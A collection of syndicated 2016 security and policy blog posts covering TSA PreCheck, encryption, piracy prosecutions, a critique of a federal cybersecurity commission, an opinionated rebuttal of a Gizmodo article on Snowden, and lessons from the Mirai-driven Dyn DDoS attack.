(**) No, not really. Apparently, kicking out the diplomats was punishment for something else, not related to the DNC hacks.

(***) It’s not clear if these “sanctions” have any teeth.

Security Risks of TSA PreCheck

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2016/12/security_risks_12.html

Former TSA Administrator Kip Hawley wrote an op-ed pointing out the security vulnerabilities in the TSA’s PreCheck program:

The first vulnerability in the system is its enrollment process, which seeks to verify an applicant’s identity. We know verification is a challenge: A 2011 Government Accountability Office report on TSA’s system for checking airport workers’ identities concluded that it was “not designed to provide reasonable assurance that only qualified applicants” got approved. It’s not a stretch to believe a reasonably competent terrorist could construct an identity that would pass PreCheck’s front end.

The other step in PreCheck’s “intelligence-driven, risk-based security strategy” is absurd on its face: The absence of negative information about a person doesn’t mean he or she is trustworthy. News reports are filled with stories of people who seemed to be perfectly normal right up to the moment they committed a heinous act. There is no screening algorithm and no database check that can accurately predict human behavior — especially on the scale of millions. It is axiomatic that terrorist organizations recruit operatives who have clean backgrounds and interview well.

None of this is news.

Back in 2004, I wrote:

Imagine you’re a terrorist plotter with half a dozen potential terrorists at your disposal. They all apply for a card, and three get one. Guess which are going on the mission? And they’ll buy round-trip tickets with credit cards and have a “normal” amount of luggage with them.

What the Trusted Traveler program does is create two different access paths into the airport: high security and low security. The intent is that only good guys will take the low-security path, and the bad guys will be forced to take the high-security path, but it rarely works out that way. You have to assume that the bad guys will find a way to take the low-security path.

The Trusted Traveler program is based on the dangerous myth that terrorists match a particular profile and that we can somehow pick terrorists out of a crowd if we only can identify everyone. That’s simply not true. Most of the 9/11 terrorists were unknown and not on any watch list. Timothy McVeigh was an upstanding US citizen before he blew up the Oklahoma City Federal Building. Palestinian suicide bombers in Israel are normal, nondescript people. Intelligence reports indicate that Al Qaeda is recruiting non-Arab terrorists for US operations.

I wrote much the same thing in 2007:

Background checks are based on the dangerous myth that we can somehow pick terrorists out of a crowd if we could identify everyone. Unfortunately, there isn’t any terrorist profile that prescreening can uncover. Timothy McVeigh could probably have gotten one of these cards. So could have Eric Rudolph, the pipe bomber at the 1996 Olympic Games in Atlanta. There isn’t even a good list of known terrorists to check people against; the government list used by the airlines has been the butt of jokes for years.

And have we forgotten how prevalent identity theft is these days? If you think having a criminal impersonating you to your bank is bad, wait until they start impersonating you to the Transportation Security Administration.

The truth is that whenever you create two paths through security — a high-security path and a low-security path — you have to assume that the bad guys will find a way to exploit the low-security path. It may be counterintuitive, but we are all safer if the people chosen for more thorough screening are truly random and not based on an error-filled database or a cursory background check.

In a companion blog post, Hawley has more details about why the program doesn’t work:

In the sense that PreCheck bars people who were identified by intelligence or law enforcement agencies as possible terrorists, then it was intelligence-driven. But using that standard for PreCheck is ridiculous since those people already get extra screening or are on the No-Fly list. The movie Patriots Day, out now, reminds us of the tragic and preventable Boston Marathon bombing. The FBI sent agents to talk to the Tsarnaev brothers and investigate them as possible terror suspects. And cleared them. Even they did not meet the “intelligence-driven” definition used in PreCheck.

The other problem with “intelligence-driven” in the PreCheck context is that intelligence actually tells us the opposite; specifically that terrorists pick clean operatives. If TSA uses current intelligence to evaluate risk, it would not be out enrolling everybody they can into pre-9/11 security for everybody not flagged by the security services.

Hawley and I may agree on the problem, but we have completely opposite solutions. The op-ed was too short to include details, but they’re in a companion blog post. Basically, he wants to screen PreCheck passengers more:

In the interests of space, I left out details of what I would suggest as short-and medium-term solutions. Here are a few ideas:

  • Immediately scrub the PreCheck enrollees for false identities. That can probably be accomplished best and most quickly by getting permission from members, and then using, commercial data. If the results show that PreCheck has already been penetrated, the program should be suspended.
  • Deploy K-9 teams at PreCheck lanes.

  • Use Behaviorally trained officers to interact with and check the credentials of PreCheck passengers.

  • Use Explosives Trace Detection cotton swabs on PreCheck passengers at a much higher rate. Same with removing shoes.

  • Turn on the body scanners and keep them fully utilized.

  • Allow liquids to stay in the carry-on since TSA scanners can detect threat liquids.

  • Work with the airlines to keep the PreCheck experience positive.

  • Work with airports to place PreCheck lanes away from regular checkpoints so as not to diminish lane capacity for non-PreCheck passengers. Rental Car check-in areas could be one alternative. Also, downtown check-in and screening (with secure transport to the airport) is a possibility.

These solutions completely ignore the data from the real-world experiment PreCheck has been. Hawley writes that PreCheck tells us that “terrorists pick clean operatives.” That’s exactly wrong. PreCheck tells us that, basically, there are no terrorists. If 1) it’s an easier way through airport security that terrorists will invariably use, and 2) there have been no instances of terrorists using it in the 10+ years it and its predecessors have been in operation, then the inescapable conclusion is that the threat is minimal. Instead of screening PreCheck passengers more, we should screen everybody else less. This is me in 2012: “I think the PreCheck level of airport screening is what everyone should get, and that the no-fly list and the photo ID check add nothing to security.”

I agree with Hawley that we need to overhaul airport security. Me in 2010: “Airport security is the last line of defense, and it’s not a very good one.” We need to recognize that the actual risk is much lower than we fear, and ratchet airport security down accordingly. And then we need to continue to invest in investigation and intelligence: security measures that work regardless of the tactic or target.

The Year Encryption Won (Wired)

Post Syndicated from jake original http://lwn.net/Articles/710093/rss

It’s not entirely clear that the title is justified, but Wired does cover some progress on the encryption front in 2016. “End-to-end encryption, which ensures that the only people who can see your communications are you and the person on the receiving end, certainly isn’t new. But in 2016, encryption went mainstream, reaching billions of people all over the world. Even more significantly, it overcame its most aggressive legal challenge yet, in a prolonged standoff between Apple and the FBI. And just this week, a Congressional committee affirmed the importance of encryption, giving hope that future laws around the topic will include at least a modicum of sanity.

There’s still a long way to go, and any gains that were made could potentially be rolled back, but for now it’s worth taking a step back to appreciate just how far encryption came this year. As far as silver linings go, you could do a lot worse.”

MPAA Takes Credit for The Shutdown of KickassTorrents

Post Syndicated from Ernesto original https://torrentfreak.com/mpaa-takes-credit-for-the-shutdown-of-kickasstorrents-161215/

dodd-laughingThis summer the U.S. Government shut down KickassTorrents, which was then the largest torrent site on the Internet.

The complaint was the result of an elaborate FBI investigation, pointing out the Ukrainian Artem Vaulin as one of the alleged masterminds.

However, it turns out that it wasn’t just the U.S. Government who put the pieces together. There’s another major force behind the shutdown that hasn’t been mentioned thus far.

MPAA boss Chris Dodd suggests that the Hollywood group also played a key role in the case. Their international arm, the MPA, is headquartered in Europe from where it actively helped the U.S. authorities to shut down KickassTorrents.

“We have now established a global hub — an office in Brussels. It has been tremendously successful in closing down Kickass Torrents, the single largest pirate site in the world,” Dodd told Variety in an interview.

The major movie studios have helped in similar criminal cases before, so this doesn’t come as a complete surprise. Generally speaking, however, the MPAA is not particularly open about the role it plays in federal investigations.

Although the takedown of KickassTorrents was a major success for Hollywood, piracy remains a problem. It’s even come to a point where Dodd himself is using the “hydra” terminology, which The Pirate Bay’s crew first brought up a decade ago.

The MPAA says that successes are still being booked every day, but they require more sophisticated methods than were used in the past.

“We make great inroads, but it is a problem that isn’t going away. Some days I do feel it is hydra-headed. But in the past few years, we have developed a more sophisticated and efficient way of dealing with piracy issues.”

At the same time, however, the pirates are getting smarter as well.

Over the years operators of sites and services have found better ways to shield their themselves from law enforcement, while making it easier for their users to consume content. While Dodd has a positive outlook, he recognizes the challenges that lie ahead.

“I am feeling more optimistic, but the pirates are getting more sophisticated. Technology not only is increasing our opportunity for more people to consume our content, but technology is also making it possible for people to steal our content, and it is not insignificant,” he concludes.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

My Priorities for the Next Four Years

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2016/12/my_priorities_f.html

Like many, I was surprised and shocked by the election of Donald Trump as president. I believe his ideas, temperament, and inexperience represent a grave threat to our country and world. Suddenly, all the things I had planned to work on seemed trivial in comparison. Although Internet security and privacy are not the most important policy areas at risk, I believe he — and, more importantly, his cabinet, administration, and Congress — will have devastating effects in that area, both in the US and around the world.

The election was so close that I’ve come to see the result as a bad roll of the dice. A few minor tweaks here and there — a more enthusiastic Sanders endorsement, one fewer of Comey’s announcements, slightly less Russian involvement — and the country would be preparing for a Clinton presidency and discussing a very different social narrative. That alternative narrative would stress business as usual, and continue to obscure the deep social problems in our society. Those problems won’t go away on their own, and in this alternative future they would continue to fester under the surface, getting steadily worse. This election exposed those problems for everyone to see.

I spent the last month both coming to terms with this reality, and thinking about the future. Here is my new agenda for the next four years:

One, fight the fights. There will be more government surveillance and more corporate surveillance. I expect legislative and judicial battles along several lines: a renewed call from the FBI for backdoors into encryption, more leeway for government hacking without a warrant, no controls on corporate surveillance, and more secret government demands for that corporate data. I expect other countries to follow our lead. (The UK is already more extreme than us.) And if there’s a major terrorist attack under Trump’s watch, it’ll be open season on our liberties. We may lose a lot of these battles, but we need to lose as few as possible and as little of our existing liberties as possible.

Two, prepare for those fights. Much of the next four years will be reactive, but we can prepare somewhat. The more we can convince corporate America to delete their saved archives of surveillance data and to store only what they need for as long as they need it, the safer we’ll all be. We need to convince Internet giants like Google and Facebook to change their business models away from surveillance capitalism. It’s a hard sell, but maybe we can nibble around the edges. Similarly, we need to keep pushing the truism that privacy and security are not antagonistic, but rather are essential for each other.

Three, lay the groundwork for a better future. No matter how bad the next four years get, I don’t believe that a Trump administration will permanently end privacy, freedom, and liberty in the US. I don’t believe that it portends a radical change in our democracy. (Or if it does, we have bigger problems than a free and secure Internet.) It’s true that some of Trump’s institutional changes might take decades to undo. Even so, I am confident — optimistic even — that the US will eventually come around; and when that time comes, we need good ideas in place for people to come around to. This means proposals for non-surveillance-based Internet business models, research into effective law enforcement that preserves privacy, intelligent limits on how corporations can collect and exploit our data, and so on.

And four, continue to solve the actual problems. The serious security issues around cybercrime, cyber-espionage, cyberwar, the Internet of Things, algorithmic decision making, foreign interference in our elections, and so on aren’t going to disappear for four years while we’re busy fighting the excesses of Trump. We need to continue to work towards a more secure digital future. And to the extent that cybersecurity for our military networks and critical infrastructure allies with cybersecurity for everyone, we’ll probably have an ally in Trump.

Those are my four areas. Under a Clinton administration, my list would have looked much the same. Trump’s election just means the threats will be much greater, and the battles a lot harder to win. It’s more than I can possibly do on my own, and I am therefore substantially increasing my annual philanthropy to support organizations like EPIC, EFF, ACLU, and Access Now in continuing their work in these areas.

My agenda is necessarily focused entirely on my particular areas of concern. The risks of a Trump presidency are far more pernicious, but this is where I have expertise and influence.

Right now, we have a defeated majority. Many are scared, and many are motivated — and few of those are applying their motivation constructively. We need to harness that fear and energy to start fixing our society now, instead of waiting four or even eight years, at which point the problems would be worse and the solutions more extreme. I am choosing to proceed as if this were cowpox, not smallpox: fighting the more benign disease today will be much easier than subjecting ourselves to its more virulent form in the future. It’s going to be hard keeping the intensity up for the next four years, but we need to get to work. Let’s use Trump’s victory as the wake-up call and opportunity that it is.

That "Commission on Enhancing Cybersecurity" is absurd

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/12/that-commission-on-enhancing.html

An Obama commission has publish a report on how to “Enhance Cybersecurity”. It’s promoted as having been written by neutral, bipartisan, technical experts. Instead, it’s almost entirely dominated by special interests and the Democrat politics of the outgoing administration.

In this post, I’m going through a random list of some of the 53 “action items” proposed by the documents. I show how they are policy issues, not technical issues. Indeed, much of the time the technical details are warped to conform to special interests.

IoT passwords

The recommendations include such things as Action Item 2.1.4:

Initial best practices should include requirements to mandate that IoT devices be rendered unusable until users first change default usernames and passwords. 

This recommendation for changing default passwords is repeated many times. It comes from the way the Mirai worm exploits devices by using hardcoded/default passwords.

But this is a misunderstanding of how these devices work. Take, for example, the infamous Xiongmai camera. It has user accounts on the web server to control the camera. If the user forgets the password, the camera can be reset to factory defaults by pressing a button on the outside of the camera.

But here’s the deal with security cameras. They are placed at remote sites miles away, up on the second story where people can’t mess with them. In order to reset them, you need to put a ladder in your truck and drive 30 minutes out to the site, then climb the ladder (an inherently dangerous activity). Therefore, Xiongmai provides a RESET.EXE utility for remotely resetting them. That utility happens to connect via Telnet using a hardcoded password.

The above report misunderstands what’s going on here. It sees Telnet and a hardcoded password, and makes assumptions. Some people assume that this is the normal user account — it’s not, it’s unrelated to the user accounts on the web server portion of the device. Requiring the user to change the password on the web service would have no effect on the Telnet service. Other people assume the Telnet service is accidental, that good security hygiene would remove it. Instead, it’s an intended feature of the product, to remotely reset the device. Fixing the “password” issue as described in the above recommendations would simply mean the manufacturer would create a different, custom backdoor that hackers would eventually reverse engineer, creating MiraiV2 botnet. Instead of security guides banning backdoors, they need to come up with standard for remote reset.

That characterization of Mirai as an IoT botnet is wrong. Mirai is a botnet of security cameras. Security cameras are fundamentally different from IoT devices like toasters and fridges because they are often exposed to the public Internet. To stream video on your phone from your security camera, you need a port open on the Internet. Non-camera IoT devices, however, are overwhelmingly protected by a firewall, with no exposure to the public Internet. While you can create a botnet of Internet cameras, you cannot create a botnet of Internet toasters.

The point I’m trying to demonstrate here is that the above report was written by policy folks with little grasp of the technical details of what’s going on. They use Mirai to justify several of their “Action Items”, none of which actually apply to the technical details of Mirai. It has little to do with IoT, passwords, or hygiene.

Public-private partnerships

Action Item 1.2.1: The President should create, through executive order, the National Cybersecurity Private–Public Program (NCP 3 ) as a forum for addressing cybersecurity issues through a high-level, joint public–private collaboration.

We’ve had public-private partnerships to secure cyberspace for over 20 years, such as the FBI InfraGuard partnership. President Clinton’s had a plan in 1998 to create a public-private partnership to address cyber vulnerabilities. President Bush declared public-private partnerships the “cornerstone of his 2003 plan to secure cyberspace.

Here we are 20 years later, and this document is full of new naive proposals for public-private partnerships There’s no analysis of why they have failed in the past, or a discussion of which ones have succeeded.

The many calls for public-private programs reflects the left-wing nature of this supposed “bipartisan” document, that sees government as a paternalistic entity that can help. The right-wing doesn’t believe the government provides any value in these partnerships. In my 20 years of experience with government private-partnerships in cybersecurity, I’ve found them to be a time waster at best and at worst, a way to coerce “voluntary measures” out of companies that hurt the public’s interest.

Build a wall and make China pay for it

Action Item 1.3.1: The next Administration should require that all Internet-based federal government services provided directly to citizens require the use of appropriately strong authentication.

This would cost at least $100 per person, for 300 million people, or $30 billion. In other words, it’ll cost more than Trump’s wall with Mexico.

Hardware tokens are cheap. Blizzard (a popular gaming company) must deal with widespread account hacking from “gold sellers”, and provides second factor authentication to its gamers for $6 each. But that ignores the enormous support costs involved. How does a person prove their identity to the government in order to get such a token? To replace a lost token? When old tokens break? What happens if somebody’s token is stolen?

And that’s the best case scenario. Other options, like using cellphones as a second factor, are non-starters.

This is actually not a bad recommendation, as far as government services are involved, but it ignores the costs and difficulties involved.

But then the recommendations go on to suggest this for private sector as well:

Specifically, private-sector organizations, including top online retailers, large health insurers, social media companies, and major financial institutions, should use strong authentication solutions as the default for major online applications.

No, no, no. There is no reason for a “top online retailer” to know your identity. I lie about my identity. Amazon.com thinks my name is “Edward Williams”, for example.

They get worse with:

Action Item 1.3.3: The government should serve as a source to validate identity attributes to address online identity challenges.

In other words, they are advocating a cyber-dystopic police-state wet-dream where the government controls everyone’s identity. We already see how this fails with Facebook’s “real name” policy, where everyone from political activists in other countries to LGBTQ in this country get harassed for revealing their real names.

Anonymity and pseudonymity are precious rights on the Internet that we now enjoy — rights endangered by the radical policies in this document. This document frequently claims to promote security “while protecting privacy”. But the government doesn’t protect privacy — much of what we want from cybersecurity is to protect our privacy from government intrusion. This is nothing new, you’ve heard this privacy debate before. What I’m trying to show here is that the one-side view of privacy in this document demonstrates how it’s dominated by special interests.

Cybersecurity Framework

Action Item 1.4.2: All federal agencies should be required to use the Cybersecurity Framework. 

The “Cybersecurity Framework” is a bunch of a nonsense that would require another long blogpost to debunk. It requires months of training and years of experience to understand. It contains things like “DE.CM-4: Malicious code is detected”, as if that’s a thing organizations are able to do.

All the while it ignores the most common cyber attacks (SQL/web injections, phishing, password reuse, DDoS). It’s a typical example where organizations spend enormous amounts of money following process while getting no closer to solving what the processes are attempting to solve. Federal agencies using the Cybersecurity Framework are no safer from my pentests than those who don’t use it.

It gets even crazier:

Action Item 1.5.1: The National Institute of Standards and Technology (NIST) should expand its support of SMBs in using the Cybersecurity Framework and should assess its cost-effectiveness specifically for SMBs.

Small businesses can’t even afford to even read the “Cybersecurity Framework”. Simply reading the doc, trying to understand it, would exceed their entire IT/computer budget for the year. It would take a high-priced consultant earning $500/hour to tell them that “DE.CM-4: Malicious code is detected” means “buy antivirus and keep it up to date”.

Software liability is a hoax invented by the Chinese to make our IoT less competitive

Action Item 2.1.3: The Department of Justice should lead an interagency study with the Departments of Commerce and Homeland Security and work with the Federal Trade Commission, the Consumer Product Safety Commission, and interested private sector parties to assess the current state of the law with regard to liability for harm caused by faulty IoT devices and provide recommendations within 180 days. 

For over a decade, leftists in the cybersecurity industry have been pushing the concept of “software liability”. Every time there is a major new development in hacking, such as the worms around 2003, they come out with documents explaining why there’s a “market failure” and that we need liability to punish companies to fix the problem. Then the problem is fixed, without software liability, and the leftists wait for some new development to push the theory yet again.

It’s especially absurd for the IoT marketspace. The harm, as they imagine, is DDoS. But the majority of devices in Mirai were sold by non-US companies to non-US customers. There’s no way US regulations can stop that.

What US regulations will stop is IoT innovation in the United States. Regulations are so burdensome, and liability lawsuits so punishing, that it will kill all innovation within the United States. If you want to get rich with a clever IoT Kickstarter project, forget about it: you entire development budget will go to cybersecurity. The only companies that will be able to afford to ship IoT products in the United States will be large industrial concerns like GE that can afford the overhead of regulation/liability.

Liability is a left-wing policy issue, not one supported by technical analysis. Software liability has proven to be immaterial in any past problem and current proponents are distorting the IoT market to promote it now.

Cybersecurity workforce

Action Item 4.1.1: The next President should initiate a national cybersecurity workforce program to train 100,000 new cybersecurity practitioners by 2020. 

The problem in our industry isn’t the lack of “cybersecurity practitioners”, but the overabundance of “insecurity practitioners”.

Take “SQL injection” as an example. It’s been the most common way hackers break into websites for 15 years. It happens because programmers, those building web-apps, blinding paste input into SQL queries. They do that because they’ve been trained to do it that way. All the textbooks on how to build webapps teach them this. All the examples show them this.

So you have government programs on one hand pushing tech education, teaching kids to build web-apps with SQL injection. Then you propose to train a second group of people to fix the broken stuff the first group produced.

The solution to SQL/website injections is not more practitioners, but stopping programmers from creating the problems in the first place. The solution to phishing is to use the tools already built into Windows and networks that sysadmins use, not adding new products/practitioners. These are the two most common problems, and they happen not because of a lack of cybersecurity practitioners, but because the lack of cybersecurity as part of normal IT/computers.

I point this to demonstrate yet against that the document was written by policy people with little or no technical understanding of the problem.

Nutritional label

Action Item 3.1.1: To improve consumers’ purchasing decisions, an independent organization should develop the equivalent of a cybersecurity “nutritional label” for technology products and services—ideally linked to a rating system of understandable, impartial, third-party assessment that consumers will intuitively trust and understand. 

This can’t be done. Grab some IoT devices, like my thermostat, my car, or a Xiongmai security camera used in the Mirai botnet. These devices are so complex that no “nutritional label” can be made from them.

One of the things you’d like to know is all the software dependencies, so that if there’s a bug in OpenSSL, for example, then you know your device is vulnerable. Unfortunately, that requires a nutritional label with 10,000 items on it.

Or, one thing you’d want to know is that the device has no backdoor passwords. But that would miss the Xiongmai devices. The web service has no backdoor passwords. If you caught the Telnet backdoor password and removed it, then you’d miss the special secret backdoor that hackers would later reverse engineer.

This is a policy position chasing a non-existent technical issue push by Pieter Zatko, who has gotten hundreds of thousands of dollars from government grants to push the issue. It’s his way of getting rich and has nothing to do with sound policy.

Cyberczars and ambassadors

Various recommendations call for the appointment of various CISOs, Assistant to the President for Cybersecurity, and an Ambassador for Cybersecurity. But nowhere does it mention these should be technical posts. This is like appointing a Surgeon General who is not a doctor.

Government’s problems with cybersecurity stems from the way technical knowledge is so disrespected. The current cyberczar prides himself on his lack of technical knowledge, because that helps him see the bigger picture.

Ironically, many of the other Action Items are about training cybersecurity practitioners, employees, and managers. None of this can happen as long as leadership is clueless. Technical details matter, as I show above with the Mirai botnet. Subtlety and nuance in technical details can call for opposite policy responses.

Conclusion

This document is promoted as being written by technical experts. However, nothing in the document is neutral technical expertise. Instead, it’s almost entirely a policy document dominated by special interests and left-wing politics. In many places it makes recommendations to the incoming Republican president. His response should be to round-file it immediately.

I only chose a few items, as this blogpost is long enough as it is. I could pick almost any of of the 53 Action Items to demonstrate how they are policy, special-interest driven rather than reflecting technical expertise.

No, it’s Matt Novak who is a fucking idiot

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/11/no-its-matt-novak-who-is-fucking-idiot.html

I keep seeing this Gizmodo piece entitled “Snowden is a fucking idiot”. I understand the appeal of the piece. The hero worship of Edward Snowden is getting old. But the piece itself is garbage.

The author, Matt Novak, is of the new wave of hard-core leftists intolerant of those who disagree with them. His position is that everyone is an idiot who doesn’t agree with his views: Libertarians, Republicans, moderate voters who chose Trump, and even fellow left-wingers that aren’t as hard-core.

If you carefully read his piece, you’ll see that Novak doesn’t actually prove Snowden is wrong. Novak doesn’t show how Snowden disagrees with facts, but only how Snowden disagrees with the left-wing view of the world, “libertarian garbage” as Novak puts it. It’s only through deduction that we come to the conclusion: those who aren’t left-wing are idiots, Snowden is not left-wing, therefore Snowden is an idiot.

The question under debate in the piece is:

technology is more important than policy as a way to protect our liberties

In other words, if you don’t want the government spying on you, then focus on using encryption (use Signal) rather than trying to change the laws so they can’t spy on you.

On a factual basis (rather than political), Snowden is right. If you live in Germany and don’t want the NSA spying on you there is little policy-wise that you can do about it, short of convincing Germany to go to war against the United States to get the US to stop spying.

Likewise, for all those dissenters in countries with repressive regimes, technology precedes policy. You can’t effect change until you first can protect yourselves from the state police who throws you in jail for dissenting. Use Signal.

In our own country, Snowden is right about “politics”. Snowden’s leak showed how the NSA was collecting everyone’s phone records to stop terrorism. Privacy organizations like the EFF supported the reform bill, the USA FREEDOM ACT. But rather than stopping the practice, the “reform” opened up the phone records to all law enforcement (FBI, DEA, ATF, IRS, etc.) for normal law enforcement purposes.

Imagine the protestors out there opposing the Dakota Access Pipeline. The FBI is shooting down their drones and blasting them with water cannons. Now, because of the efforts of the EFF and other privacy activists, using the USA FREEDOM ACT, the FBI is also grabbing everyone’s phone records in the area. Ask yourself who is the fucking idiot here: the guy telling you to use Signal, or the guy telling you to focus on “politics” to stop this surveillance.

Novak repeats the hard-left version of the creation of the Internet:

The internet has always been monitored by the state. It was created by the fucking US military and has been monitored from day one. Surveillance of the internet wasn’t invented after September 11, 2001, no matter how many people would like to believe that to be the case.

No, the Internet was not created by the US military. Sure, the military contributed to the Internet, but the majority of contributions came from corporations, universities, and researchers. The left-wing claim that the government/military created the Internet involves highlighting their contributions while ignoring everyone else’s.

The Internet was not “monitored from day one”, because until the 1990s, it wasn’t even an important enough network to monitor. As late as 1993, the Internet was dwarfed in size and importance by numerous other computer networks – until the web took off that year, the Internet was considered a temporary research project. Those like Novak writing the history of the Internet are astonishingly ignorant of the competing networks of those years. They miss XNS, AppleTalk, GOSIP, SNA, Novel, DECnet, Bitnet, Uunet, Fidonet, X.25, Telenet, and all the other things that were really important during those years.

And, mass Internet surveillance did indeed come only after 9/11. The NSA’s focus before that was on signals and telephone lines, because that’s where all the information was.  When 9/11 happened, they were still trying to catch up to the recent growth of the Internet. Virtually everything Snowden documents came after 9/11. Sure, they had programs like FAIRVIEW that were originally created to get telephone information in the 1970s, but these programs only started delivering mass Internet information after 9/11. Sure, the NSA occasionally got emails before 9/11, but nothing like the enormous increase in collection afterwards.

What I’ve shown here is that Matt Novak is a fucking idiot. He gets basic facts wrong about how the Internet works. He doesn’t prove Snowden’s actually wrong by citing evidence, only that Snowden is wrong because he disagrees with what leftists like Novak believe to be right. All the actual evidence supports Snowden in this case.

It doesn’t mean we should avoid politics. Technology and politics are different things, it’s not either-or. Whether we do one has no impact on deciding to do the other. But if you are a DAP protester, use Signal instead of unencrypted messaging or phone, instead of waiting for activists to pass legislation.

Pirate App Store Operator Convicted for Criminal Copyright Infringement

Post Syndicated from Ernesto original https://torrentfreak.com/pirate-app-store-operator-convicted-for-criminal-copyright-infringement-161119/

snappzAssisted by police in France and the Netherlands, the FBI took down the “pirate” Android stores Appbucket, Applanet, and SnappzMarket during the summer of 2012.

The domain seizures were the first ever against “rogue” mobile app marketplaces and followed similar actions against BitTorrent and streaming sites.

During the years that followed several people connected to the Android app sites were arrested and indicted. Most cases are still pending, but this week one of the operators of SnappzMarket was convicted.

The now 26-year-old Joshua Taylor, a resident of Kentwood, Michigan, was convicted of conspiracy to commit criminal copyright infringement during a bench trial this week.

Taylor’s attorney had filed a motion to dismiss the case, claiming that the indictment was inadequate and unclear, but U.S. District Judge Timothy Batten Sr. denied this request.

Taylor was found guilty instead and now awaits his sentencing, which is scheduled to take place February next year.

Taylor found guilty

taylotguilty

The Department of Justice (DoJ) is pleased with the guilty verdict. They note that Taylor and his co-conspirators distributed more than a million apps without permission from the copyright holders, causing significant losses.

“The total retail value of the more than one million pirated apps distributed by the SnappzMarket Group was estimated to have been more than $1.7 million, according to evidence presented at previous court proceedings,” DoF notes.

Two other co-conspirators, Jon Peterson Gary Edwin Sharp II, previously pleaded guilty and will be sentenced at a later date as well. The three all face up to several years in prison.

This summer, SnappzMarket’s ‘PR manager’ Scott Walton was the first of the group to receive his sentence. He was convicted to 46 months in prison for conspiracy to commit copyright infringement.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and ANONYMOUS VPN services.

Lessons From the Dyn DDoS Attack

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2016/11/lessons_from_th_5.html

A week ago Friday, someone took down numerous popular websites in a massive distributed denial-of-service (DDoS) attack against the domain name provider Dyn. DDoS attacks are neither new nor sophisticated. The attacker sends a massive amount of traffic, causing the victim’s system to slow to a crawl and eventually crash. There are more or less clever variants, but basically, it’s a datapipe-size battle between attacker and victim. If the defender has a larger capacity to receive and process data, he or she will win. If the attacker can throw more data than the victim can process, he or she will win.

The attacker can build a giant data cannon, but that’s expensive. It is much smarter to recruit millions of innocent computers on the internet. This is the “distributed” part of the DDoS attack, and pretty much how it’s worked for decades. Cybercriminals infect innocent computers around the internet and recruit them into a botnet. They then target that botnet against a single victim.

You can imagine how it might work in the real world. If I can trick tens of thousands of others to order pizzas to be delivered to your house at the same time, I can clog up your street and prevent any legitimate traffic from getting through. If I can trick many millions, I might be able to crush your house from the weight. That’s a DDoS attack ­ it’s simple brute force.

As you’d expect, DDoSers have various motives. The attacks started out as a way to show off, then quickly transitioned to a method of intimidation ­ or a way of just getting back at someone you didn’t like. More recently, they’ve become vehicles of protest. In 2013, the hacker group Anonymous petitioned the White House to recognize DDoS attacks as a legitimate form of protest. Criminals have used these attacks as a means of extortion, although one group found that just the fear of attack was enough. Military agencies are also thinking about DDoS as a tool in their cyberwar arsenals. A 2007 DDoS attack against Estonia was blamed on Russia and widely called an act of cyberwar.

The DDoS attack against Dyn two weeks ago was nothing new, but it illustrated several important trends in computer security.

These attack techniques are broadly available. Fully capable DDoS attack tools are available for free download. Criminal groups offer DDoS services for hire. The particular attack technique used against Dyn was first used a month earlier. It’s called Mirai, and since the source code was released four weeks ago, over a dozen botnets have incorporated the code.

The Dyn attacks were probably not originated by a government. The perpetrators were most likely hackers mad at Dyn for helping Brian Krebs identify ­ and the FBI arrest ­ two Israeli hackers who were running a DDoS-for-hire ring. Recently I have written about probing DDoS attacks against internet infrastructure companies that appear to be perpetrated by a nation-state. But, honestly, we don’t know for sure.

This is important. Software spreads capabilities. The smartest attacker needs to figure out the attack and write the software. After that, anyone can use it. There’s not even much of a difference between government and criminal attacks. In December 2014, there was a legitimate debate in the security community as to whether the massive attack against Sony had been perpetrated by a nation-state with a $20 billion military budget or a couple of guys in a basement somewhere. The internet is the only place where we can’t tell the difference. Everyone uses the same tools, the same techniques and the same tactics.

These attacks are getting larger. The Dyn DDoS attack set a record at 1.2 Tbps. The previous record holder was the attack against cybersecurity journalist Brian Krebs a month prior at 620 Gbps. This is much larger than required to knock the typical website offline. A year ago, it was unheard of. Now it occurs regularly.

The botnets attacking Dyn and Brian Krebs consisted largely of unsecure Internet of Things (IoT) devices ­ webcams, digital video recorders, routers and so on. This isn’t new, either. We’ve already seen internet-enabled refrigerators and TVs used in DDoS botnets. But again, the scale is bigger now. In 2014, the news was hundreds of thousands of IoT devices ­ the Dyn attack used millions. Analysts expect the IoT to increase the number of things on the internet by a factor of 10 or more. Expect these attacks to similarly increase.

The problem is that these IoT devices are unsecure and likely to remain that way. The economics of internet security don’t trickle down to the IoT. Commenting on the Krebs attack last month, I wrote:

The market can’t fix this because neither the buyer nor the seller cares. Think of all the CCTV cameras and DVRs used in the attack against Brian Krebs. The owners of those devices don’t care. Their devices were cheap to buy, they still work, and they don’t even know Brian. The sellers of those devices don’t care: They’re now selling newer and better models, and the original buyers only cared about price and features. There is no market solution because the insecurity is what economists call an externality: It’s an effect of the purchasing decision that affects other people. Think of it kind of like invisible pollution.

To be fair, one company that made some of the unsecure things used in these attacks recalled its unsecure webcams. But this is more of a publicity stunt than anything else. I would be surprised if the company got many devices back. We already know that the reputational damage from having your unsecure software made public isn’t large and doesn’t last. At this point, the market still largely rewards sacrificing security in favor of price and time-to-market.

DDoS prevention works best deep in the network, where the pipes are the largest and the capability to identify and block the attacks is the most evident. But the backbone providers have no incentive to do this. They don’t feel the pain when the attacks occur and they have no way of billing for the service when they provide it. So they let the attacks through and force the victims to defend themselves. In many ways, this is similar to the spam problem. It, too, is best dealt with in the backbone, but similar economics dump the problem onto the endpoints.

We’re unlikely to get any regulation forcing backbone companies to clean up either DDoS attacks or spam, just as we are unlikely to get any regulations forcing IoT manufacturers to make their systems secure. This is me again:

What this all means is that the IoT will remain insecure unless government steps in and fixes the problem. When we have market failures, government is the only solution. The government could impose security regulations on IoT manufacturers, forcing them to make their devices secure even though their customers don’t care. They could impose liabilities on manufacturers, allowing people like Brian Krebs to sue them. Any of these would raise the cost of insecurity and give companies incentives to spend money making their devices secure.

That leaves the victims to pay. This is where we are in much of computer security. Because the hardware, software and networks we use are so unsecure, we have to pay an entire industry to provide after-the-fact security.

